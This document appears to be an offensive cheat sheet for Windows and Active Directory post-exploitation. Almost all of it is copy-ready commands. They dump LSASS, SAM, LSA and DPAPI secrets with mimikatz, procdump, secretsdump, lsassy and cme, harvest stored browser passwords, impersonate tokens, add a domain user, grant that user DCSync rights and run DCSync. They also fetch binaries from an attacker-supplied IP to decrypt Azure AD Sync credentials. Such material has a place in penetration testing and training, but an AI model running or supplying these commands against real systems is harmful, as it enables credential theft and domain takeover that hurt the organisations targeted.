Administrator account

Extract credentials from LSASS

procdump

procdump.exe --acepteula -ma lsass.exe lsass.dmp

mimikatz

mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"

mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"

Meterpreter

load kiwi

creds_all

cme

cme smb <ip-range> -u <user> -p <password> -M lsassy

lsassy

lsassy -d <domain> -u <user> -p <password> <ip>

Extract Credentials from SAM

secretsdump

secretsdump.py <domain>/<user>:<password>@<ip>

cme

cme smb <ip-range> -u <user> -p <password> --sam

Meterpreter

hashdump

registries

reg save HKLM\SAM <file>;
reg save HKLM\SECURITY <file>;
reg save HKLM\SYSTEN <file>;

secretsdump.py -sam SAM -system SYSTEM LOCAL

mimikatz

mimikatz "privilege::debug" "lsadump::sam" "exit"

Shadow Copy

Shadow copies

diskshadow list shadows all

mklink /d c:\shadowcopy\\?\GLOBALROOT\Device\Harddisk VolumeShadowCopy\

Extract Credentials from LSA

cme

cme smb <ip-range> -u <user> -p <password> --lsa

secretsdump

secretsdump.py <domain>/<user>:<password>@<ip>

secretsdump.py -security <security-file> -system <system-file> LOCAL

reg.py

reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb-ip>\share'

Extract dpapi

donPAPI

DonPAPI.py <domain>/<user>:<password>@<target>

mimikatz

mimikatz.exe "sekurlsa::dpapi"

Untitled

secretsdump.py <domain>/<user>:<password>@<ip>

Search Password Files

findstr /si 'password' *.txt *.xml .docx

Search Stored Password

lazagne.exe all

Chrome

%appdata%\Local\Google\Chrome\User Data\Default

SharpChromium.exe

Token Manipulation

incognito

.\incognito.exe list_tokens -u

.\incognito.exe execute -c "<domain>\<user>" powershell.exe

Meterpreter

use incognito

impersonate_token <domain>\\<user>

cme

cme smb <ip> -u <user> -p <password> -M impersonate

Account Operators Group Membership

Add User

net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>

Import PowerView

powershell -ep bypass
. .\PowerView.ps1

Add DCSync Rights

$pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=<DOMAIN>" -PrincipalIdentity <USERNAME> -Rights DCSync

DCSync

impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>'

Azure Admin Group Membership

If an user is Admin of Azure Group we can try to exploit Azure AD Sync to grab the administrator password:

Release Initial release · VbScrub/AdSyncDecryptGitHub

iwr <IP>/AdDecryp.exe -o AdDecrypt.exe
iwr <IP>/mcrypt.dll -o mcrypt.dll

Then run this command being inside the path C:\Program Files\Microsoft Azure AD Sync\Bin :

C:\Temp\AdDecrypt.exe -FullSQL